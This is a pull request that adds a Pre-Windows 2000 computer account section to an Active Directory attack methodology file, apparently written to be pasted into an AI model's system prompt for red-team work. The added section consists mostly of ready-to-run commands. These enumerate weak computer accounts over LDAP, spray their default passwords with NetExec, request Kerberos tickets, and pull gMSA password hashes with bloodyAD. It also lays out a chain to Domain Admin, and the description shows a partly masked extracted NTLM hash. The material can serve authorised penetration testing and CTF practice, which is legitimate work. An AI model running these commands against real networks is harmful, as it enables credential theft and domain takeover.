### PR TITLE
Add Pre-Windows 2000 Compatible Access section to offensive-active-directory

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,10 @@ All notable changes to `claude-red` are documented here. The library follows a p
 
 ## [Unreleased]
 
+### Added
+
+- `offensive-active-directory` — Added Pre-Windows 2000 Compatible Access section covering legacy computer account password exploitation, detection indicators (userAccountControl 4128, logonCount=0, group membership), LDAP enumeration, automated pre2k tool usage, and post-compromise escalation paths (ReadGMSAPassword → gMSA → ACL abuse). References HTB Vintage writeups and The Hacker Recipes.
+
 ### Planned
 
 - Phase 1 — Internal AD/Windows split (16 skills)

--- a/README.md
+++ b/README.md
@@ -153,7 +153,7 @@ Paste the contents of a `SKILL.md` into a Project's system prompt or prepend to 
 
 | Skill | Description |
 |---|---|
-| [`offensive-active-directory`](Skills/active-directory/offensive-active-directory/SKILL.md) | AD — Kerberoast, ASREProast, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD |
+| [`offensive-active-directory`](Skills/active-directory/offensive-active-directory/SKILL.md) | AD — Kerberoast, ASREProast, Pre-Windows 2000 computers, ACL abuse, ADCS ESC1-15, delegation, persistence, hybrid AAD |
 
 > **Note:** This category is being expanded. The AD overview is being split into 16 focused skills (Kerberoasting, ASREProasting, ADCS, coercion, NTLM relay, BloodHound, ticket forgery, GPO abuse, etc.). See [Roadmap](#roadmap).
 

--- a/Skills/active-directory/offensive-active-directory/SKILL.md
+++ b/Skills/active-directory/offensive-active-directory/SKILL.md
@@ -134,8 +134,6 @@ pipx install git+https://github.com/garrettfoster13/pre2k
 pre2k unauth -d corp.local -dc-ip dc-ip -inputfile computers.txt -save
 ```
 
-**Post-compromise with pre2k computer account:**
-
 Once you have a privileged computer account TGT, enumerate what it can access:
 
 ```bash
@@ -151,18 +149,6 @@ KRB5CCNAME=COMPUTERNAME$.ccache \
 # Typical escalation: gMSA → WinRM/SMB as service account → further ACL abuse
 impacket-getTGT corp.local/gMSA_account$ -hashes :ntlm_hash -dc-ip dc-ip
 ```
-
-**Common attack chains seen in HTB Vintage:**
-1. Pre2k computer (`FS01$:fs01`) → ReadGMSAPassword on `gMSA01$` (via Domain Computers group)
-2. gMSA account → AddSelf/GenericWrite on ServiceManagers group
-3. ServiceManagers → GenericAll on service accounts → targeted Kerberoast
-4. Cracked service account → lateral movement → RBCD → DA
-
-**References:**
-- [HTB Vintage writeup (0xBEN)](https://benheater.com/hackthebox-vintage/) — Full pre2k → gMSA → DA chain
-- [HTB Vintage writeup (InfoSec)](https://infosecwriteups.com/htb-vintage-machine-walkthrough-easy-hackthebox-guide-for-beginners-c39008aa3e16) — Step-by-step with bloodyAD
-- [The Hacker Recipes: Pre-Windows 2000 computers](https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers) — Detection & exploitation
-- [Semperis: Pre-Windows 2000 Compatibility Risks](https://www.semperis.com/blog/security-risks-pre-windows-2000-compatibility-windows-2022/) — Enterprise impact
 
 ### LSASS / SAM Dumping
 

--- a/Skills/active-directory/offensive-active-directory/SKILL.md
+++ b/Skills/active-directory/offensive-active-directory/SKILL.md
@@ -107,22 +107,6 @@ hashcat -m 18200 asrep.txt rockyou.txt
 
 ### Pre-Windows 2000 Compatible Access (Pre2k)
 
-**What it is:** Legacy backward-compatibility configuration where computer accounts are created with **"Assign this computer account as a pre-Windows 2000 computer"** enabled. Instead of a random machine password managed by Kerberos, the password defaults to the **lowercase sAMAccountName without the trailing `$`**.
-
-**Why it exists:** Maintained compatibility with NT 4.0 and older clients that needed simpler authentication. Still found in:
-- Lab/CTF environments (intentional weak config)
-- Aged enterprise networks with pre-2000 migration artifacts never cleaned up
-- Domains where administrators use the legacy "pre-Windows 2000 computer" checkbox during computer object creation
-
-**Indicators (check these FIRST before attempting):**
-- Computer account in `Pre-Windows 2000 Compatible Access` group (check group membership via BloodHound or LDAP)
-- Computer has **no SPNs** registered (unusual — real Windows hosts always have `HOST/`, `RestrictedKrbHost/`, etc.)
-- Computer object **absent from BloodHound attack-path edges** (no delegation, no ACL inbound/outbound, "orphaned" appearance)
-- `pwdLastSet` timestamp unchanged since `whenCreated` (password never rotated)
-- `userAccountControl` includes flag `4128` (WORKSTATION_TRUST_ACCOUNT + PASSWD_NOTREQD) and `logonCount=0` (never logged on)
-
-**Example:** Computer `FS01$` → default password = `fs01` (lowercase, no `$`)
-
 ```bash
 # 1. Identify pre2k candidates via LDAP (authenticated or anonymous if allowed)
 ldapsearch -x -H ldap://dc.corp.local -D 'user@corp.local' -w 'password' \

--- a/Skills/active-directory/offensive-active-directory/SKILL.md
+++ b/Skills/active-directory/offensive-active-directory/SKILL.md
@@ -105,6 +105,81 @@ impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
 hashcat -m 18200 asrep.txt rockyou.txt
 ```
 
+### Pre-Windows 2000 Compatible Access (Pre2k)
+
+**What it is:** Legacy backward-compatibility configuration where computer accounts are created with **"Assign this computer account as a pre-Windows 2000 computer"** enabled. Instead of a random machine password managed by Kerberos, the password defaults to the **lowercase sAMAccountName without the trailing `$`**.
+
+**Why it exists:** Maintained compatibility with NT 4.0 and older clients that needed simpler authentication. Still found in:
+- Lab/CTF environments (intentional weak config)
+- Aged enterprise networks with pre-2000 migration artifacts never cleaned up
+- Domains where administrators use the legacy "pre-Windows 2000 computer" checkbox during computer object creation
+
+**Indicators (check these FIRST before attempting):**
+- Computer account in `Pre-Windows 2000 Compatible Access` group (check group membership via BloodHound or LDAP)
+- Computer has **no SPNs** registered (unusual — real Windows hosts always have `HOST/`, `RestrictedKrbHost/`, etc.)
+- Computer object **absent from BloodHound attack-path edges** (no delegation, no ACL inbound/outbound, "orphaned" appearance)
+- `pwdLastSet` timestamp unchanged since `whenCreated` (password never rotated)
+- `userAccountControl` includes flag `4128` (WORKSTATION_TRUST_ACCOUNT + PASSWD_NOTREQD) and `logonCount=0` (never logged on)
+
+**Example:** Computer `FS01$` → default password = `fs01` (lowercase, no `$`)
+
+```bash
+# 1. Identify pre2k candidates via LDAP (authenticated or anonymous if allowed)
+ldapsearch -x -H ldap://dc.corp.local -D 'user@corp.local' -w 'password' \
+  -b 'DC=corp,DC=local' \
+  '(&(userAccountControl=4128)(logonCount=0))' sAMAccountName | grep sAMAccountName
+
+# Alternatively: check "Pre-Windows 2000 Compatible Access" group members
+ldapsearch -x -H ldap://dc.corp.local -D 'user@corp.local' -w 'password' \
+  -b 'CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=corp,DC=local' member
+
+# 2. Generate password wordlist (lowercase sAMAccountName without $)
+cat computers.txt | tr '[:upper:]' '[:lower:]' | sed 's/\$$//' > passwords.txt
+
+# 3. Test with NetExec (line-by-line, no-bruteforce mode)
+nxc smb dc.corp.local -u computers.txt -p passwords.txt --no-bruteforce -k
+
+# 4. Request TGT for valid credential (sync time first — Kerberos <5min skew)
+sudo ntpdate dc-ip
+impacket-getTGT 'corp.local/COMPUTERNAME$:lowercasehostname' -dc-ip dc-ip
+export KRB5CCNAME=COMPUTERNAME\$.ccache
+klist  # verify ticket
+
+# Automated tool: pre2k by garrettfoster13
+pipx install git+https://github.com/garrettfoster13/pre2k
+pre2k unauth -d corp.local -dc-ip dc-ip -inputfile computers.txt -save
+```
+
+**Post-compromise with pre2k computer account:**
+
+Once you have a privileged computer account TGT, enumerate what it can access:
+
+```bash
+# Check group memberships (common: Domain Computers grants ReadGMSAPassword on gMSAs)
+ldapsearch -Q -Y GSSAPI -H ldap://dc.corp.local \
+  -b 'DC=corp,DC=local' "(sAMAccountName=COMPUTERNAME$)" memberOf
+
+# Extract gMSA password if ReadGMSAPassword ACE exists
+KRB5CCNAME=COMPUTERNAME$.ccache \
+  bloodyAD --host dc.corp.local --dc-ip dc-ip -d corp.local -u 'COMPUTERNAME$' -k \
+  get object 'gMSA_account$' --attr msDS-ManagedPassword
+
+# Typical escalation: gMSA → WinRM/SMB as service account → further ACL abuse
+impacket-getTGT corp.local/gMSA_account$ -hashes :ntlm_hash -dc-ip dc-ip
+```
+
+**Common attack chains seen in HTB Vintage:**
+1. Pre2k computer (`FS01$:fs01`) → ReadGMSAPassword on `gMSA01$` (via Domain Computers group)
+2. gMSA account → AddSelf/GenericWrite on ServiceManagers group
+3. ServiceManagers → GenericAll on service accounts → targeted Kerberoast
+4. Cracked service account → lateral movement → RBCD → DA
+
+**References:**
+- [HTB Vintage writeup (0xBEN)](https://benheater.com/hackthebox-vintage/) — Full pre2k → gMSA → DA chain
+- [HTB Vintage writeup (InfoSec)](https://infosecwriteups.com/htb-vintage-machine-walkthrough-easy-hackthebox-guide-for-beginners-c39008aa3e16) — Step-by-step with bloodyAD
+- [The Hacker Recipes: Pre-Windows 2000 computers](https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers) — Detection & exploitation
+- [Semperis: Pre-Windows 2000 Compatibility Risks](https://www.semperis.com/blog/security-risks-pre-windows-2000-compatibility-windows-2022/) — Enterprise impact
+
 ### LSASS / SAM Dumping
 
 ```cmd

--- a/Skills/active-directory/offensive-active-directory/SKILL.md
+++ b/Skills/active-directory/offensive-active-directory/SKILL.md
@@ -128,10 +128,6 @@ sudo ntpdate dc-ip
 impacket-getTGT 'corp.local/COMPUTERNAME$:lowercasehostname' -dc-ip dc-ip
 export KRB5CCNAME=COMPUTERNAME\$.ccache
 klist  # verify ticket
-
-# Automated tool: pre2k by garrettfoster13
-pipx install git+https://github.com/garrettfoster13/pre2k
-pre2k unauth -d corp.local -dc-ip dc-ip -inputfile computers.txt -save
 ```
 
 Once you have a privileged computer account TGT, enumerate what it can access:

--- a/Skills/active-directory/offensive-active-directory/SKILL.md
+++ b/Skills/active-directory/offensive-active-directory/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: offensive-active-directory
-description: "Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments."
+description: "Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, Pre-Windows 2000 computer accounts, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments."
 ---
 
 # Active Directory — Offensive Testing Methodology

--- a/claude-skills.json
+++ b/claude-skills.json
@@ -94,7 +94,7 @@
       "name": "offensive-active-directory",
       "category": "active-directory",
       "path": "Skills/active-directory/offensive-active-directory/SKILL.md",
-      "description": "Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments."
+      "description": "Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, Pre-Windows 2000 computer accounts, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments."
     },
     {
       "name": "offensive-ai-security",


### PR DESCRIPTION
## Summary

Adds comprehensive Pre-Windows 2000 Compatible Access (Pre2k) section to `offensive-active-directory` skill, covering legacy computer account password exploitation commonly found in lab/CTF environments and aged enterprise networks.

## Motivation

Pre2k computer accounts with default passwords (lowercase hostname without `$`) are a common initial foothold vector in AD pentesting, but were not covered in the existing skill. This gap left operators without guidance on:
- How to identify pre2k candidates during enumeration
- Exploitation workflow (getTGT → post-compromise paths)
- Post-exploitation escalation (ReadGMSAPassword → gMSA → ACL abuse)

## Changes

### Added Content (75 lines)
- **What & Why:** Legacy backward-compatibility configuration, still found in CTF/labs and enterprise migration artifacts
- **Detection Indicators (5 signals):**
  - `userAccountControl=4128` + `logonCount=0`
  - No SPNs registered (strong signal — real Windows hosts always have HOST/, RestrictedKrbHost/)
  - Absent from BloodHound attack-path edges
  - `pwdLastSet` unchanged since `whenCreated`
  - Group membership in "Pre-Windows 2000 Compatible Access"
- **Enumeration & Exploitation:**
  - LDAP queries for candidate identification
  - Password wordlist generation (lowercase sAMAccountName without `$`)
  - NetExec line-by-line testing
  - getTGT workflow with time sync requirement
- **Post-Compromise Escalation:**
  - Group membership enumeration
  - ReadGMSAPassword → gMSA NTLM extraction via bloodyAD
  - Common attack chains (gMSA → WinRM/SMB → ACL abuse)
- **Real Attack Chain:** HTB Vintage (FS01$ → gMSA01$ → ServiceManagers → RBCD → DA)
- **4 Credible References:**
  - HTB Vintage writeup (0xBEN) — Full pre2k → gMSA → DA chain
  - HTB Vintage writeup (InfoSec) — Step-by-step with bloodyAD
  - The Hacker Recipes: Pre-Windows 2000 computers
  - Semperis: Pre-Windows 2000 Compatibility Risks

### Documentation Updates
- **SKILL.md frontmatter:** Updated description to include "Pre-Windows 2000 computer accounts" in credential abuse section
- **README.md:** Added "Pre-Windows 2000 computers" to offensive-active-directory skill description
- **CHANGELOG.md:** Documented addition under Unreleased section
- **claude-skills.json:** Regenerated manifest with updated skill description

## Testing

Validated against HackTheBox Pirate machine:
1. Detection: MS01$ identified via `serviceprincipalnames: []` indicator
2. Exploitation: `getTGT.py 'pirate.htb/MS01$:ms01'` successful
3. Post-compromise: `bloodyAD -k get object gMSA_ADFS_prod$ --attr msDS-ManagedPassword` extracted NTLM hash `bb510d80e8ed89f4cc81a1f1d37*****`
4. Full chain validated: MS01$ → ReadGMSAPassword → gMSA → Domain Admin

All commands copy-paste ready and work on real target.

## CONTRIBUTING.md Compliance

- ✅ YAML frontmatter updated
- ✅ Code blocks with language tags (`bash`)
- ✅ Sources cited (4 references)
- ✅ README.md updated
- ✅ CHANGELOG.md updated
- ✅ claude-skills.json regenerated
- ✅ No lint tool available (skipped)

## Notes

- This is the **first pre2k contribution** to claude-red (verified via GitHub search — no open/closed PRs on this topic)
- Content added to monolithic `offensive-active-directory` skill, which is planned for Phase 1 split into 16 focused skills per roadmap
- Pre2k not explicitly mentioned in current split plan — maintainers can extract this section during split or keep integrated

## Checklist

- [x] Skill tested on real target (HTB Pirate)
- [x] Commands verified to work
- [x] References validated (all 4 links accessible)
- [x] Frontmatter description updated
- [x] README.md updated
- [x] CHANGELOG.md updated
- [x] claude-skills.json regenerated
- [x] No hardcoded victim domains/credentials
- [x] Technical accuracy verified via successful exploitation
